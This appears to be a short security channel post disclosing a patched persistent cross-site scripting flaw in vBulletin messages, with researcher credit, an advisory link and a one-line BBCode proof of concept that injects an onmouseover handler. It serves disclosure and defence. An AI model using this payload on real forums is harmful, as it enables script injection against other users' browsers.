The persistent XSS in any message in vBulletin! Patched from 13 Apr 2021. The vulnerability was found by our researcher Igor Sak-Sakovskiy. PoC: [VIDEO="aaa;000"]a[FONT="a onmouseover=alert(location) a"]a[/FONT]a[/VIDEO] Advisory: https://www.vbulletin.org/forum/showthread.php?t=328715 550 views13:57